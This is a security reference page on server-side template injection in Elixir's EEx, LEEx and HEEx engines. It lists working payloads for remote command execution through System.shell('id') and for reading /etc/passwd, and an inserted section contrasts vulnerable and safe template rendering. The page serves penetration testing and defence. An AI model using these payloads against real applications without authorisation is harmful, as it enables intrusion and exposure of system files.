
Server Side Template Injection - Elixir

Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation.

Summary

Templating Libraries

| Template Name | Payload Format |
|---------------|----------------|
| EEx           | `<%= %>`       |
| LEEx          | `<%= %>`       |
| HEEx          | `<%= %>`       |

Universal Payloads

Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx.

By default, only EEx can render templates from a string, but LEEx and HEEx can be used as replacement engines for EEx.

To use these payloads, wrap them in the appropriate tag.

elem(System.shell("id"), 0) # Rendered RCE
[1, 2][elem(System.shell("id"), 0)] # Error-Based RCE
1/((elem(System.shell("id"), 1) == 0)&&1||0) # Boolean-Based RCE
elem(System.shell("id && sleep 5"), 0) # Time-Based RCE
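As an added example (not part of the original page), the root cause behind the payloads above: untrusted input spliced into the template *source* is compiled and evaluated, while the same input passed as a binding is only ever data. The module name, function names and the `user_input` variable are assumptions.

```elixir
# Added example, not from the original page or from the EEx project.
# Assumption: `user_input` is an untrusted request parameter.
defmodule Greeting do
  # VULNERABLE: the untrusted value becomes part of the template source, so a
  # value such as "<%= 7 * 7 %>" is compiled and evaluated as Elixir code.
  def render_unsafe(user_input) when is_binary(user_input) do
    EEx.eval_string("Hello, " <> user_input <> "!")
  end

  # SAFE: the template source is a fixed literal; the untrusted value is passed
  # as a binding, so any "<%= %>" it contains is echoed literally, not evaluated.
  def render_safe(user_input) when is_binary(user_input) do
    EEx.eval_string("Hello, <%= name %>!", name: user_input)
  end

  # Detection aid for logging/alerting: flags input that carries an EEx tag.
  # This is a hint for monitoring, not a substitute for using bindings.
  def contains_template_tag?(user_input) when is_binary(user_input) do
    String.contains?(user_input, "<%")
  end
end

input = "<%= 7 * 7 %>"

# The binding-based render keeps the tag as plain text.
IO.puts(Greeting.render_safe(input))

# The concatenation-based render evaluates the arithmetic inside the tag.
IO.puts(Greeting.render_unsafe(input))

if Greeting.contains_template_tag?(input) do
  IO.puts("alert: template tag found in untrusted input")
end
```

Reviewing a code base for `EEx.eval_string/2`, `EEx.eval_file/2` or `EEx.compile_string/2` calls whose first argument is not a compile-time literal is the quickest way to find the vulnerable pattern.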

EEx

Official website

EEx stands for Embedded Elixir.

EEx - Basic injections

<%= 7 * 7 %>

EEx - Retrieve /etc/passwd

<%= File.read!("/etc/passwd") %>

EEx - Remote Command execution

<%= elem(System.shell("id"), 0) %> # Rendered RCE
<%= [1, 2][elem(System.shell("id"), 0)] %> # Error-Based RCE
<%= 1/((elem(System.shell("id"), 1) == 0)&&1||0) %> # Boolean-Based RCE
<%= elem(System.shell("id && sleep 5"), 0) %> # Time-Based RCE

References